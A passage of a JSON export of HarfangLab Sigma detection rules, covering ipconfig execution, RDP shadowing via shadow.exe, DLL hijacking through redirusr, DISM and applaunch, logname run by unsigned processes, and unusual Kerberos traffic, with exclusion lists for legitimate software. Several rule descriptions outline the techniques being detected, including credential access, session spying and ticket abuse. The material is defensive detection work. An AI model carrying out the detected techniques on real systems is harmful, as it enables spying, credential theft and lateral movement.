ParentImage|endswith: '\\webexmta.exe'\n GrandparentImage|endswith:\n - '\\atmgr.exe'\n - '\\ptoneclk.exe'\n\n exclusion_ocs_inventory:\n CommandLine|endswith: ' /displaydns'\n ParentImage|endswith: '\\powershell.exe'\n ParentCommandLine|contains|all:\n - 'OCS Inventory Agent'\n - 'Saas.ps1'\n GrandparentImage|endswith: '\\cmd.exe'\n GrandparentCommandLine|contains|all:\n - 'OCS Inventory Agent'\n - 'Saas.ps1'\n\n exclusion_ad_health_adfs_agent:\n # C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoExit -Command &{write-host Executing Elevated PowerShell Command: Register-AzureADConnectHealthADFSAgent; import-module $env:ProgramW6432\\Azure` Ad` Connect` Health` Adfs` Agent\\PowerShell\\AdHealthAdfs; Register-AzureADConnectHealthADFSAgent}\n ParentCommandLine|contains: 'Register-AzureADConnectHealthADFSAgent'\n\n exclusion_commvault_diagnostics:\n # D:\\APP\\Commvault\\ContentStore\\Base\\sendLogFiles.exe\n - GrandparentImage|endswith:\n - '\\CvDiagnostics.exe'\n - '\\Commvault\\ContentStore\\Base\\sendLogFiles.exe'\n # C:\\Windows\\system32\\cmd.exe /c IPCONFIG /ALL >> \"E:\\APP\\Commvault\\iDataAgent\\JobResults\\Support_5536_7640_1635426317\\1635426317_1dd8_SystemConfig.txt\"\n # C:\\Windows\\system32\\cmd.exe /c IPCONFIG /ALL >> \"E:\\APP\\iDataAgent\\JobResults\\Support_6116_16112_1635426317\\1635426317_3ef0_SystemConfig.txt\"\n - ParentCommandLine|contains: '\\iDataAgent\\JobResults'\n\n exclusion_netsh:\n ParentImage: '?:\\Windows\\System32\\netsh.exe'\n ParentCommandLine|contains: 'wlan show wlanreport'\n\n exclusion_neovacom:\n ParentImage: '?:\\Neovacom\\eai\\ext\\\\*\\bin\\java.exe'\n GrandparentImage: '?:\\Neovacom\\eai\\ext\\bin\\wrapper.exe'\n\n # Cortana search bar\n exclusion_cortana:\n ParentImage: '?:\\Windows\\System32\\sihost.exe'\n GrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s UserManager'\n\n exclusion_azure_networkwatcher:\n ParentCommandLine: '?:\\Windows\\System32\\cmd.exe /c ipconfig /all >> config\\\\*.txt'\n GrandparentCommandLine: '?:\\Windows\\system32\\cscript.exe ?:\\Windows\\system32\\gatherNetworkInfo.vbs'\n\n exclusion_oracle:\n GrandparentCommandLine|contains: 'oracle.sysman.db.discovery.plugin'\n GrandparentImage|endswith: '\\perl.exe'\n\n exclusion_anaconda:\n ParentImage|endswith:\n - '\\Anaconda\\python.exe'\n - '\\Anaconda\\pythonw.exe'\n - '\\Anaconda3\\python.exe'\n - '\\Anaconda3\\pythonw.exe'\n - '\\Anaconda\\envs\\\\*\\python.exe'\n - '\\Anaconda\\envs\\\\*\\pythonw.exe'\n - '\\Anaconda3\\envs\\\\*\\python.exe'\n - '\\Anaconda3\\envs\\\\*\\pythonw.exe'\n ParentCommandLine|contains: 'spyder'\n\n exclusion_anaconda_2:\n Ancestors|contains:\n - '\\Anaconda\\python.exe|'\n - '\\Anaconda\\pythonw.exe|'\n - '\\Anaconda3\\python.exe|'\n - '\\Anaconda3\\pythonw.exe|'\n - '\\Anaconda\\envs\\\\*\\python.exe|'\n - '\\Anaconda\\envs\\\\*\\pythonw.exe|'\n - '\\Anaconda3\\envs\\\\*\\python.exe|'\n - '\\Anaconda3\\envs\\\\*\\pythonw.exe|'\n\n exclusion_maxhub:\n GrandparentCommandLine: '?:\\Users\\\\*\\AppData\\Roaming\\Screenshare\\Bundle\\Maxhub.exe'\n\n exclusion_hospitalis:\n ProcessAncestors|startswith:\n - '?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\wscript.exe|?:\\Windows\\System32\\svchost.exe|'\n - '?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\wscript.exe|?:\\Windows\\System32\\taskeng.exe|'\n GrandparentCommandLine|contains|all:\n - '\\Hospitalis\\'\n - 'Transfert_FTP_Hospitalis.vbs'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dc40e7d9-a996-45bf-a2ae-f8caf1816852",
"rule_name": "Ipconfig Execution",
"rule_description": "Detects the execution of ipconfig.exe, a legitimate Windows utility used to gather network interface information.\nAdversaries may execute ipconfig.exe to collect network information for reconnaissance or data exfiltration purposes.\nIt is recommended to investigate the source and context of ipconfig.exe execution and correlate this alert with other discovery activities.\n",
"rule_creation_date": "2021-05-17",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1016"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dc440cf6-da0d-4e1d-b6cd-f8bebbf66176",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077124Z",
"creation_date": "2026-03-23T11:45:34.077126Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077130Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.bitsadmin.com/spying-on-users-using-rdp-shadowing",
"https://swarm.ptsecurity.com/remote-desktop-services-shadowing/",
"https://attack.mitre.org/techniques/T1563/002/"
],
"name": "t1563_002_rdp_shadow_session_via_shadow.yml",
"content": "title: RDP Shadow Session via Shadow Utility\nid: dc440cf6-da0d-4e1d-b6cd-f8bebbf66176\ndescription: |\n Detects a command-line containing parameters for the Shadow RDP Client (shadow.exe), to log into an RDP Shadow Session.\n This action may or may not trigger an authorization pop-up, according to how the target machine is configured.\n This can be used by attackers to spy or hijack an user's RDP session, as a means of acquiring credentials or moving laterally through the network.\n To investigate this action, you can check the following registry value in the target machine: \"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\"\n 0 - No remote control allowed;\n 1 - Full Control with user's permission;\n 2 - Full Control without user's permission;\n 3 - View Session with user's permission;\n 4 - View Session without user's permission.\n This can also be allowed through group policy.\n This may be a legitimate action from a tech support team.\nreferences:\n - https://blog.bitsadmin.com/spying-on-users-using-rdp-shadowing\n - https://swarm.ptsecurity.com/remote-desktop-services-shadowing/\n - https://attack.mitre.org/techniques/T1563/002/\ndate: 2023/08/25\nmodified: 2025/03/27\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1563.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Shadow\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'shadow.exe'\n CommandLine|contains: ' ?server'\n\n exclusion_systancia:\n GrandparentImage:\n - '?:\\Program Files\\Systancia\\AppliDis\\AppliDis Serveur\\bin\\LaunchShadow64.exe'\n - '?:\\Program Files (x86)\\Systancia\\AppliDis\\AppliDis Serveur\\bin\\LaunchShadow64.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dc440cf6-da0d-4e1d-b6cd-f8bebbf66176",
"rule_name": "RDP Shadow Session via Shadow Utility",
"rule_description": "Detects a command-line containing parameters for the Shadow RDP Client (shadow.exe), to log into an RDP Shadow Session.\nThis action may or may not trigger an authorization pop-up, according to how the target machine is configured.\nThis can be used by attackers to spy or hijack an user's RDP session, as a means of acquiring credentials or moving laterally through the network.\nTo investigate this action, you can check the following registry value in the target machine: \"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\"\n0 - No remote control allowed;\n1 - Full Control with user's permission;\n2 - Full Control without user's permission;\n3 - View Session with user's permission;\n4 - View Session without user's permission.\nThis can also be allowed through group policy.\nThis may be a legitimate action from a tech support team.\n",
"rule_creation_date": "2023-08-25",
"rule_modified_date": "2025-03-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1563.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dc52ce55-3228-42fd-9d4d-b5e511c28a9b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602030Z",
"creation_date": "2026-03-23T11:45:34.602033Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602041Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_redirusr.yml",
"content": "title: DLL Hijacking via redirusr.exe\nid: dc52ce55-3228-42fd-9d4d-b5e511c28a9b\ndescription: |\n Detects potential Windows DLL Hijacking via redirusr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'redirusr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dc52ce55-3228-42fd-9d4d-b5e511c28a9b",
"rule_name": "DLL Hijacking via redirusr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via redirusr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dcacfe01-86ff-4919-826c-7eceb4b2233b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595037Z",
"creation_date": "2026-03-23T11:45:34.595041Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595049Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cofense.com/exploiting-unpatched-vulnerability-ave_maria-malware-not-full-grace/",
"https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dism.yml",
"content": "title: DLL Hijacking via DIS.exe\nid: dcacfe01-86ff-4919-826c-7eceb4b2233b\ndescription: |\n Detects potential Windows DLL Hijacking via DIS.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://cofense.com/exploiting-unpatched-vulnerability-ave_maria-malware-not-full-grace/\n - https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'DISM.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dismcore.dll'\n - '\\version.dll'\n - '\\wimgapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dcacfe01-86ff-4919-826c-7eceb4b2233b",
"rule_name": "DLL Hijacking via DIS.exe",
"rule_description": "Detects potential Windows DLL Hijacking via DIS.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dcb1a0c4-a1b3-4296-879e-423ee2d61e72",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081424Z",
"creation_date": "2026-03-23T11:45:34.081426Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081430Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://www.secureworks.com/research/shadowpad-malware-analysis",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_applaunch.yml",
"content": "title: DLL Hijacking via applaunch.exe\nid: dcb1a0c4-a1b3-4296-879e-423ee2d61e72\ndescription: |\n Detects potential Windows DLL Hijacking via applaunch.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://www.secureworks.com/research/shadowpad-malware-analysis\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'applaunch.exe'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n ImageLoaded|endswith: '\\mscoree.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\Microsoft.NET\\Framework\\v*\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dcb1a0c4-a1b3-4296-879e-423ee2d61e72",
"rule_name": "DLL Hijacking via applaunch.exe",
"rule_description": "Detects potential Windows DLL Hijacking via applaunch.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dcdd8674-3f5e-4d34-b37d-c24938f23b0a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617792Z",
"creation_date": "2026-03-23T11:45:34.617794Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617798Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cloud.google.com/blog/topics/threat-intelligence/north-korea-supply-chain/?hl=en",
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1033_logname_unsigned_parents.yml",
"content": "title: Users Discovered via Logname by an Unsigned Process\nid: dcdd8674-3f5e-4d34-b37d-c24938f23b0a\ndescription: |\n Detects the execution of logname by an unsigned process.\n Adversaries may attempt to identify the primary user, currently logged-in user, set of users that commonly use a system, or whether a user is actively using the system.\n It is recommended to check for other suspicious activity by the parent process.\nreferences:\n - https://cloud.google.com/blog/topics/threat-intelligence/north-korea-supply-chain/?hl=en\n - https://attack.mitre.org/techniques/T1033/\ndate: 2024/09/26\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|endswith: '/logname'\n\n selection_unsigned:\n - ProcessParentSigned: 'false'\n - ProcessGrandparentSigned: 'false'\n\n condition: selection and 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dcdd8674-3f5e-4d34-b37d-c24938f23b0a",
"rule_name": "Users Discovered via Logname by an Unsigned Process",
"rule_description": "Detects the execution of logname by an unsigned process.\nAdversaries may attempt to identify the primary user, currently logged-in user, set of users that commonly use a system, or whether a user is actively using the system.\nIt is recommended to check for other suspicious activity by the parent process.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dce8900d-6bdc-42c6-ab73-04731d439106",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295908Z",
"creation_date": "2026-03-23T11:45:35.295911Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295918Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://en.hackndo.com/kerberoasting/",
"https://github.com/GhostPack/Rubeus/",
"https://attack.mitre.org/techniques/T1558/"
],
"name": "t1558_kerberos_traffic_from_unusual_process.yml",
"content": "title: Kerberos Traffic from Unusual Process\nid: dce8900d-6bdc-42c6-ab73-04731d439106\ndescription: |\n Detects a network communication to the port 88 (Kerberos protocol) by an unusual process.\n Adversaries may use Kerberos exploitation tools such as Rubeus to communicate with Kerberos' KDC and obtain tickets on behalf of other users.\n It is recommended to verify the legitimacy of this network connection and check the detected process for any suspicious activity.\nreferences:\n - https://en.hackndo.com/kerberoasting/\n - https://github.com/GhostPack/Rubeus/\n - https://attack.mitre.org/techniques/T1558/\ndate: 2023/10/27\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1558\n - attack.lateral_movement\n - attack.t1550\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: network_connection\n product: windows\ndetection:\n selection:\n DestinationPort: '88'\n Initiated: 'true'\n ProcessImage|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\public\\'\n - '?:\\users\\\\*\\appdata\\'\n - '?:\\\\?Recycle.Bin\\'\n\n filter_legitimate_microsoft:\n ProcessImage:\n - '?:\\Windows\\System32\\lsass.exe'\n - '\\Device\\HarddiskVolume*\\Windows\\System32\\lsass.exe'\n - '?:\\Windows\\SysWOW64\\vmnat.exe'\n - '?:\\Windows\\System32\\svchost.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v*\\powershell.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v*\\powershell_ise.exe'\n - '?:\\Windows\\system32\\SnippingTool.exe'\n - '?:\\Windows\\System32\\mstsc.exe'\n - '?:\\Windows\\explorer.exe'\n - '?:\\Windows\\System32\\telnet.exe'\n - '?:\\Windows\\LTSvc\\LTSVC.exe'\n\n exclusion_foglight:\n ProcessImage|endswith: '\\fog-*\\bin\\fglam.exe'\n\n exclusion_tomcat:\n - ProcessImage|endswith:\n - '\\tomcat\\bin\\tomcat?.exe'\n - '\\tomcat?\\bin\\tomcat?.exe'\n - ProcessSignature:\n - 'The Apache Software Foundation'\n - 'CodeSigning for The Apache Software Foundation'\n\n exclusion_hlwin:\n ProcessImage|endswith: '\\hlmwin\\exe\\h2000.exe'\n\n exclusion_jetbrain:\n - ProcessImage|endswith:\n - '\\bin\\idea64.exe'\n - '\\bin\\pycharm64.exe'\n - ProcessSignature: 'JetBrains s.r.o.'\n\n exclusion_java:\n - ProcessSigned: 'true'\n ProcessOriginalFileName:\n - 'java.exe'\n - 'javaw.exe'\n - ProcessImage|endswith: '\\sapjvm\\bin\\java.exe'\n\n exclusion_solarwind:\n ProcessSigned: 'true'\n ProcessSignature: 'SolarWinds WorldWide, LLC'\n\n exclusion_kinit:\n ProcessImage|endswith: '\\kinit.exe'\n\n exclusion_outlook_content:\n ProcessImage:\n - '?:\\Windows\\System32\\mspaint.exe'\n - '?:\\Windows\\System32\\notepad.exe'\n ProcessCommandLine|contains: '\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\'\n\n exclusion_share:\n ProcessImage:\n - '?:\\Windows\\System32\\mspaint.exe'\n - '?:\\Windows\\System32\\notepad.exe'\n ProcessCommandLine|contains: ' \\\\\\\\'\n\n exclusion_paint:\n ProcessImage: '?:\\Windows\\System32\\mspaint.exe'\n\n exclusion_sap:\n ProcessSigned: 'true'\n ProcessSignature: 'SAP SE'\n\n exclusion_mobatek:\n ProcessSigned: 'true'\n ProcessSignature: 'Mobatek'\n\n exclusion_mremoteng:\n ProcessImage|endswith: '\\mRemoteNG\\mRemoteNG.exe'\n\n exclusion_ipscanner:\n ProcessImage|endswith:\n - '\\advanced_port_scanner.exe'\n - '\\advanced_ip_scanner.exe'\n\n exclusion_karakun:\n ProcessImage|endswith: 'javaws.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Karakun AG'\n\n exclusion_nettools:\n ProcessImage|endswith: '\\nettools.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Axence Inc.'\n\n exclusion_dbeaver:\n ProcessSigned: 'true'\n ProcessSignature: 'DBeaver Corp'\n\n exclusion_easypilot:\n ProcessImage|endswith: '\\easyPilot_Srv.exe'\n\n exclusion_mpv:\n ProcessImage: '?:\\ProgramData\\chocolatey\\lib\\mpvio.install\\tools\\mpv.com'\n\n exclusion_s2eup:\n ProcessImage: 